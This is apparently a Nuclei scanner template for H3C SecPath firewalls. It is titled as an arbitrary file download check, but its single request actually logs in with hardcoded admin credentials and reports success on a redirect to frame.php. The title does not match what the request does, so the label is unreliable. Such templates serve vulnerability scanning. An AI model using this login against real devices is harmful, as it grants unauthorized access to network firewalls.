id: H3C-SecPath-fileDownload

info:
  name: H3C SecPath 下一代防火墙 任意文件下载漏洞
  author: Str1am
  severity: high
  tags: SecPath,fileDownload

requests:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=admin&pwd=bravo_2008&login=login

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "window.location='frame.php'"
        part: body
        condition: and